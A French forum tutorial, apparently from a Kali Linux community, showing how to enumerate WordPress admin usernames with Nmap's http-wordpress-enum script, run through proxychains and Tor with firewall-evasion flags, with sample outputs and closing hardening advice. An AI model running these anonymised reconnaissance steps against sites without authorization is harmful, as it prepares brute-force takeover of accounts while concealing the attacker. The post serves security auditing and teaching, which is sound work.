Auteur Sujet: Trouver le login administrateur d'un blog Wordpress mal sécurisé  (Lu 5654 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Teeknofil

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 368
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Dans ce test de sécurité je vais vous montrer comment trouver le login d’un blog WordPress qui est mal sécurisé avant la publication du produit en dev. Ce test de vulnérabilité a pour but de savoir si le login admin par défaut est toujours configuré. Si cette négligence est présente il aura sans nul doute la porte ouverte à  une attaque brute force qui sera couronné de succès car les utilisateur mette de mots de passe simple pour pas les oubliées.

Quand on installe un blog WordPress le login par défaut est admin. L’identifiant peut être changer après l’installation, mais il est néccessaire dans le développement de WordPress pour l’installation par défaut et il permet de faciliter l’installation du blog à  tout le monde

Script Nmap  http-wordpress-enum

 
Ce script NSE Nmap permet d’énumérer les noms d’utilisateurs dans un blog WordPress en exploitant une vulnérabilité de divulgation d’informations existant dans les versions 2.6 à  3.2-bétas2 et d’autres versions mal sécuriser.

–script http-wordpress-enum : permets d'appeler le script qui teste le login de WordPress dans Nmap.
–script-args limit=50 : limite la rechercher à  50 teste de login.

root@kali:~# nmap -p80 --script http-wordpress-enum <WordpressSite>
root@kali:~# nmap -sV --script http-wordpress-enum --script-args limit=50 <WordpressSite>

Si vous faites un audit de sécurité en boite noir avec Nmap il faut utiliser proxychains avec Tor (attention de bien configurer proxychains avec TOR). Pour éviter les fuites DNS avec Tor on va indiquer l’option -n pour ne pas faire de résolution DNS et on va indiquer de ne pas faire de Ping avec l’option -Pn. Pour éviter un firewall trop strict on va aussi mettre l’option -g 80 pour indiquer que la requétte provient du port 80.

root@kali:~# proxychains nmap -Pn -g 80 -n -p80 --script http-wordpress-enum --script-args limit=5 wordpress-exemple.com

ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-16 10:54 CET
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88-<><>-OK
Nmap scan report for wordpress-exemple.com (85.236.158.88)
Host is up (0.015s latency).
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 3.88 seconds

 Sur ce premier test on fait chou blanc, le blog n’est pas vulnérable ou trop bien sécuriser et le login admin n’est pas utilisé. Dans ce cas inutile de perdre son temps à  faire une attaque brute force au hasard sans connaitre le login. Dans le cas contraire on aurait ce type de résultat.

Exemple 1 : login admin

root@kali:~# proxychains nmap -Pn -g 80 -n -p80 --script http-wordpress-enum --script-args limit=20 wordpress-exemple.com

ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-16 10:54 CET
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.136.108.88-<><>-OK
Nmap scan report for wordpress-exemple.com (85.236.158.88)
Host is up (0.035s latency).
PORT STATE SERVICE
80/tcp open http
| http-wordpress-enum:
| Username found: admin
|_Search stopped at ID #20. Increase the upper limit if necessary with 'http-wordpress-enum.limit'

Nmap done: 1 IP address (1 host up) scanned in 3.88 seconds

Exemple 2 : blog vulnérable

root@kali:~# proxychains nmap -Pn -g 80 -n -p80 --script http-wordpress-enum --script-args limit=5 wordpress-exemple.com

ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-16 10:54 CET
|D-chain|-<>-127.0.0.1:9050-<><>-95.106.108.18:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.106.108.18:80-<><>-OK
|D-chain|-<>-127.0.0.1:9050-<><>-95.106.108.18-<><>-OK
Nmap scan report for wordpress-exemple.com (95.106.108.18)
Host is up (0.035s latency).
PORT STATE SERVICE
80/tcp open http syn-ack
| http-wordpress-enum:
| Username found: admin
| Username found: mauricio
| Username found: cesar
| Username found: lean
| Username found: alex
| Username found: ricardo
|_Search stopped at ID #20. Increase the upper limit if necessary with 'http-wordpress-enum.limit Nmap done: 1 IP address (1 host up) scanned in 3.88 seconds

Une solution préventive contre une attaque brute force sur la page wp-login.php est de définir des règles d'accès dans le fichier .htaccès du site. Avec le fichier .htaccess vous pouvez bloquer l'accès de la page wp-login.php à toutes les adresses IP publique et autoriser uniquement une adresse IP d'un administrateur. Veiller quand même à ne pas mettre une adresse IP d'une box car en cas d'accès au htacess un pirate récupérer l'adresse IP permettant une attaque par déni de service. Utiliser l'adresse IP d'un VPN ou proie privée. Si vous n'avez pas ce type infrastructure en place vous pouvez déterminer dans le fichier htacces l'adresse du réseau autorisé à voir la page wp-login.php, permettant de pas divulguer l'adresse précise de l'administrateur et rédacteur. Attention dans votre fichier htaccess à la vulnérabilité tamper data. Compéter cette sécurité par un fichier htpasswd . Faire attention au plugin qui modifie l'interface de connexion de Word presse. Une pas utilisée le login admin et préférer une suite de lettres et de chiffre aléatoire comme un ID. Mettre à jour WordPress pour corriger les vulnérabilités des anciennes versions, si vous abandonnez votre blog activé la mise à jour automatique, penser à vos visiteurs.

Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION

Hors ligne Teeknofil

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 368
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Re : Trouver le login administrateur d'un blog Wordpress mal sécurisé
« Réponse #1 le: 23 juillet 2015 à 21:50:24 »
Merci de pas écrire sur cette page est d'ouvrir un autre post. Ce billet est pour les professionnels IT, il est interdit d'audité un site sans autorisation. Toutes demande d’assistance pour un attaque sera sanctionner par l'admin avec un ban. Toutes informations sensible dans ce tutoriel sont factice, falsifier et reproduise seulement des vrai test.
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION